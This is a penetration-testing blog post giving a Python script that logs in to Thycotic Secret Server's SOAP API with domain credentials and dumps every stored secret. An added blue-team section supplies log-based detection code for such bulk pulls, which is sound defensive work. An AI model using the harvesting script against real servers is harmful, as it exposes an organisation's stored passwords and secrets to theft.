A blog about coding, Infosec, penetration testing, and random topics
Thursday, December 12, 2019
Pillage Thycotic Secret Server
If you want to grab all the secrets from Thycotic's Secret Server, use the SOAP API to pull them out. Assuming you have valid domain creds, run the following script.
#!/usr/bin/env python3
from zeep import Client

# Connect to the SOAP API endpoint
client = Client("https://secretserver.example.com/SecretServer/webservices/SSWebservice.asmx?wsdl")

# Grab your auth token for all your requests
token = client.service.Authenticate("user_here", "pass_here", "", "domain_here")

# Grab all secrets for the user
searchSecret = client.service.SearchSecrets(token.Token, "*")

# Output the secret values for each secret
for secret in searchSecret.SecretSummaries.SecretSummary:
    print(client.service.GetSecret(token.Token, secret['SecretId']))
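For the blue-team side, an added example (not part of the original post): the script above sends one POST to SSWebservice.asmx per secret, so a burst of POSTs from a single client stands out in the web server's access log. The sketch assumes IIS W3C-format logs with a `#Fields:` header; the function names, window, and threshold are hypothetical, and the log lines are constructed.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta

ENDPOINT = "/secretserver/webservices/sswebservice.asmx"  # path from the post, lowercased
WINDOW = timedelta(seconds=60)  # assumed tuning value
THRESHOLD = 5                   # assumed tuning value; baseline against normal use

# Constructed sample log (not real traffic): one client bursts, others do not.
_HIT = "POST /SecretServer/webservices/SSWebservice.asmx"
SAMPLE_LOG = "\n".join(
    ["#Fields: date time cs-method cs-uri-stem c-ip sc-status"]
    + [f"2019-12-12 10:00:{s:02d} {_HIT} 10.0.0.5 200" for s in range(8)]
    + [f"2019-12-12 10:01:00 {_HIT} 10.0.0.9 200",
       f"2019-12-12 10:09:00 {_HIT} 10.0.0.9 200",
       "2019-12-12 10:09:05 GET /SecretServer/ 10.0.0.7 200"]
)

def parse_w3c(text):
    """Yield one dict per log row, keyed by the names in the #Fields header."""
    fields = []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            parts = line.split()
            if len(parts) == len(fields):  # skip truncated or malformed rows
                yield dict(zip(fields, parts))

def find_bulk_soap_clients(text, window=WINDOW, threshold=THRESHOLD):
    """Return {client_ip: peak POST count} for clients that reach the threshold
    of POSTs to the SOAP endpoint inside one sliding window."""
    recent = defaultdict(deque)  # client IP -> timestamps still inside the window
    flagged = {}
    for row in parse_w3c(text):
        if row["cs-method"] != "POST" or row["cs-uri-stem"].lower() != ENDPOINT:
            continue
        ts = datetime.strptime(f"{row['date']} {row['time']}", "%Y-%m-%d %H:%M:%S")
        hits = recent[row["c-ip"]]
        hits.append(ts)
        while ts - hits[0] > window:  # drop timestamps that aged out
            hits.popleft()
        if len(hits) >= threshold:
            flagged[row["c-ip"]] = max(flagged.get(row["c-ip"], 0), len(hits))
    return flagged

if __name__ == "__main__":
    print(find_bulk_soap_clients(SAMPLE_LOG))
```

Legitimate integrations also call this endpoint, so known service hosts should be baselined before alerting on the result.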